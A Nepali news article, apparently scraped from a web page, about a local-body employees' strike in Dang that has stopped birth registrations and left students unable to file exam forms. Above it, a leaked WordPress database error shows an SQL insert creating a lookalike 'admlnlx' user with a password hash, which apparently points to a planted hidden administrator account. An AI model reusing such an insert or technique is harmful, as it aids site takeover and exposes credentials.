WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAdVUOmkhgp8HJvkET0iVC/A0I343q0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 22:51:40', '', 'admlnlx', 'admlnlx')
दाङ, फागुन ५ –
स्थानीय निकाए कर्मचारीको आन्दोलनका कारण विद्यार्थी पनि मर्कामा परेका छन् ।
आन्दोलनका कारण दाङमा हजारौँ सेवाग्राही र विद्यार्थीले सास्ती खेप्नुपरेको छ । स्थानीय निकाय बन्द हुँदा सिफारिस, जन्मदर्ता, जग्गा बेचबिखन, चार किल्ला प्रमाणित, नक्सा पास, योजना सम्झौता तथा भुक्तानीलगायतका मुख्य काम प्रभावित हुँदा सेवाग्राही आक्रोशीत भएका छन् ।
यस्तै कक्षा ८ मा अध्ययन गर्ने विद्यार्थीको जन्मदर्ता गर्ने कार्य प्रभावित हुँदा विद्यार्थीले परीक्षा फारामसमेत भर्न पाएका छैनन् । जिल्ला शिक्षा कार्यालय, दाङले यही फागुन ५ गतेसम्म फाराम बुझाउन सूचना गरे पनि कर्मचारी आन्दोलनका कारण स्थानीय निकायको काम कारवाही प्रभावित हुँदा विद्यार्थीले जन्मदर्ता गराउन पाएका छैन् ।
दाङका तुलसीपुर नगरपालिका, त्रिपुर नगरपालिका, घोराही नगरपालिका, लमही नगरपालिका, जिविस र ३१ गाविस कर्मचारीले कामकाज ठप्प पारेपछि जन्मदर्ता वा विदेश पढ्नका लागि सिफारिस लिन चाहने विद्यार्थी मर्कामा परेका हुन् ।
सरकारले राज्य पुनःसंरचनाको मापदण्डअनुसार स्थानीय निकायमा कार्यरत कर्मचारीलाई सम्मानपूर्वक समायोजन गर्नुपर्ने, अस्थायी करार कर्मचारीलाई स्थायी गर्नुपर्ने, स्थानीय निकायको निर्वाचन गर्नुपर्नेलगायतका विभिन्न माग राखेर स्थानीय निकाएका कर्मचारी माघ २५ गतेदेखि आन्दोलनरत् छन् । – रासस